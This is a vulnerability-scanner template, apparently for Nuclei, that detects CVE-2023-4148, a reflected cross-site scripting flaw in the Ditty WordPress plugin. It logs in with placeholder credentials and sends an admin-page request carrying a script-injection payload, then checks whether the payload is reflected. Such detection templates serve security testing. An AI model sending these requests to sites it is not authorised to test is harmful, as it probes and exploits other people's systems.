52 lines
1.9 KiB
YAML
52 lines
1.9 KiB
YAML
id: CVE-2023-4148
|
|
|
|
info:
|
|
name: Ditty < 3.1.25 - Cross-Site Scripting
|
|
author: r3Y3r53
|
|
severity: medium
|
|
description: |
|
|
The Ditty WordPress plugin before 3.1.25 does not sanitise and escape some parameters and generated URLs before outputting them back in attributes, leading to Reflected Cross-Site Scripting which could be used against high privilege users such as admin.
|
|
remediation: Fixed in version 3.1.25
|
|
reference:
|
|
- https://wpscan.com/vulnerability/aa39de78-55b3-4237-84db-6fdf6820c58d
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-4148
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 6.1
|
|
cve-id: CVE-2023-4148
|
|
cwe-id: CWE-79
|
|
epss-score: 0.00071
|
|
epss-percentile: 0.2977
|
|
cpe: cpe:2.3:a:metaphorcreations:ditty:*:*:*:*:*:wordpress:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 2
|
|
vendor: metaphorcreations
|
|
product: ditty
|
|
framework: wordpress
|
|
publicwww-query: /wp-content/plugins/ditty-news-ticker/
|
|
tags: cve,cve2023,ditty-news-ticker,wordpress,wp-plugin,wpscan,wp,authenticated
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST /wp-login.php HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
log={{username}}&pwd={{password}}&wp-submit=Log+In
|
|
- |
|
|
GET /wp-admin/edit.php?post_type=ditty&page=ditty_export&tab=export_ditty&"><script>alert(/XSS/)</script> HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
cookie-reuse: true
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- 'status_code_2 == 200'
|
|
- 'contains(body_2, "<script>alert(/XSS/)</script>") && contains(body_2, "ditty")'
|
|
- 'contains(content_type_2, "text/html")'
|
|
condition: and
|
|
|
|
# digest: 4a0a00473045022100bad92e9c9467c8d2a5610e2b27b927c78c3915f5b3d2fbfdbe56613de5930ac70220042091ffba9adf4e9b354bc81501e32de9f62ecffc1d343e4ef210199fed9410:922c64590222798bb761d5b6d8e72950
|